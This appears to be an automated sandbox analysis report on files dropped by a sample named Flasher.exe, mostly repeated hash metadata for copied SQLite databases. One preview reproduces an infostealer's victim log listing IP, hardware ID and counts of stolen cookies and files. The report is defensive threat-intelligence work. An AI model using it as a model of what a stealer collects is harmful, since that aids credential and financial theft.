                                                                    Preview:PK.........Y.*.M............DTBZGIOOSO.docxDTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXD
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):548
                                                                    Entropy (8bit):5.305841157444733
                                                                    Encrypted:false
                                                                    SSDEEP:12:eM3lxmRQN3oi238Q8Fxx6YFSrJFVucOlQM7NlVrPBQM3aWfgHdAej01/kq:eQNNYv383xxVuD/M7NlVrPe8GAejU/kq
                                                                    MD5:B613BE31E8993E67982984CA38B35F3F
                                                                    SHA1:2A6C175073FEFB4F39D4E4444B8297FA484E3BA8
                                                                    SHA-256:50389921CC955A4AC0D6B21C2DB479562F7B656C357D30E54DA2E3EC30666E81
                                                                    SHA-512:50CCB7BA811A001E1573F9F82BE154F3119E933A8FE99E7EBDBDE15CFAD33BA2ED05444DF102BF4F91AA64B41F5152E737343A9DF22014C6F1A732530CA97A33
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..- IP Info -....IP: 8.46.123.189..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -05:00....- PC Info -....OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - YT3TY (1280, 1024)..HWID: 5676401068884178..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Flasher.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -....Passwords: ....Cookies: . 25...Wallets: ....Files: . 18...Credit Cards: ..
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
